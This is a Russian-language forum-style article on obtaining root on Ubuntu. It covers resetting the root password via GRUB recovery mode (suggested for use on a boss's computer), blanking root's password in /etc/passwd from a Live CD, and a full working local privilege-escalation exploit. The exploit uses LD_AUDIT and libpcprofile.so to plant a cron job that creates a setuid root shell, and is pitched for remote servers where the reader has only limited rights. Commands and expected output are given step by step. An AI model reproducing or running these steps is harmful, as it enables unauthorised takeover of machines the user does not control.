Новичку полезно

  • Баннер
  • А знаете ли вы что?

    - rudvs знает всё о твоих желаниях!


Получение root в ubuntu

Теги: root, ubuntu, права

Введение

Здравствуйте уважаемые. Часто в чате и на форумах я вижу всякие вопросы с дистрибутивом linux ubuntu. И что то я загорелся желанием написать статью о том, как можно получить права супер пользователя (root). Сегодня я постараюсь описать несколько вариантов получения суперпользователя у данного дистрибутива. Ну, что заинтересовались? Ну, тогда давайте посмотрим, что как и где :). Первый вариант Иногда бывают такие случаи, что вы просто забыли пароль от суперпользователя а он вам очень нужен, или же вы имеете физический доступ к компьютеру, шефа например а на вашей организации не любят платить за ПО и стоит ОС Linux а еще и ubuntu. Так вот, собираемся с мыслями, закатываем рукава, как говорится берем в руки бубен и подходим к компьютеру, садимся уверенно на стул и начинаем. Нежно нажимаем кнопочку питания компьютера, и видим как начинают бегать циферки bios, но нас интересует далее проходящие события. Далее срабатывает загрузчик под название GRUB. GRUB позволяет пользователю иметь несколько установленных операционных систем и при включении компьютера выбирать одну из них для загрузки. Далее загрузчик выбирает ядро или ОС если у вас стоит windows. По дефолту грузится последняя сборка ядра. Но, что бы попасть к выбору нам необходимо нажать клавишу ESC (эскэйп). Далее выбираем recovery mod, необходимо выбрать Drop to root shell. Теперь вводите команду passwd, после вводите новый пароль, затем система попросит вас подтвердить пароль. Ну, как вы понимаете ввод пароля не будет виден, так что выстукивайте на клавиатуре внимательно. После проделанного вам необходимо выйти из данного режима и для этого необходимо перезагрузить компьютер. Для этого нужно написать reboot и нажать ENTER. Загрузившись нажимаем Ctrl+Alt+F2 вводим в место login: root а в место password: ваш новый пароль. И вот вы зашли под root пользователем.

Второй вариант.

В случае того, если у вас, что то не получилось с первым вариантом, то вполне можно воспользоваться вторым вариантом который работает без сбоев. Но для этого вам понадобится Live CD, например можно взять тот же диск ubuntu с которого вы устанавливали ОС на свой компьютер. Теперь заходим в папку /etc/passwd и заменяем в строчке с рутом "x" на звездочку *. После этого перезагружаемся, заходим в нашу систему под рутом без пароля и радуемся жизни.

Третий вариант.

А этот вариант затрагивает такие случаи, когда вы не имеете физический доступ к машине а только удаленный. Например на удаленном сервере у вас есть учетная запись с ограниченными правами. Но вам например нужно установить для себя какую не будь мощную программу. Данный способ работает в ubuntu версии не выше 10.4. Эту уязвимость нашел Тэфис Арманди из Google Security Team — эксперт по компьютерной безопасности. Он нашел ошибку в динамическом линкере, который позволяет делать предварительную нагрузку пользователем библиотек для программ с установленным stuid-битом. Данная уязвимость существовала 4 года, но разработчики не латали дырку так как думали, что реализовать эту уязвимость не возможно. Но Тэфис Арманди доказал, что ее можно реализовать и написал эсплойт. Сам эксплоит локальный, и работает в командной строке, то есть все что будет написано ниже, нужно писать в командной строке системы.

$ umask 0
$ dpkg -S /lib/libpcprofile.so

Вы должны получить такую строчку «libc6: /lib/libpcprofile.so»

$ ls -l /lib/libpcprofile.so

Получаем «-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so»

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

Получаем « ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored. Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline] [-p pattern] [-s packetsize] [-t ttl] [-I interface or address] [-M mtu discovery hint] [-S sndbuf] [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination»

$ ls -l /etc/cron.d/exploit

Получаем «-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit»

$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit

Пишем дальше $ ls -l /tmp/exploit Получаем «-rwsr-xr-x 1 root root 83888 2010-10-21 14:25 /tmp/exploit»

$ /tmp/exploit

Получаем «

# whoami

root»

Вот так можно получить прова суперпользователя ну удаленном серваке. Удачной установки программ или еще чего либо, на что хватит смикалки :)

Заключение

Вот такими вот не хитрыми способами можно получить права суперпользователя в ubuntu. Ну, я бы мог щас по выдумывать на последок какого не будь умного текста. Но думаю вам не хочется забивать мозги а быстрее хочется попробовать. Желаю удачи!!!

Добавить комментарий


Обновить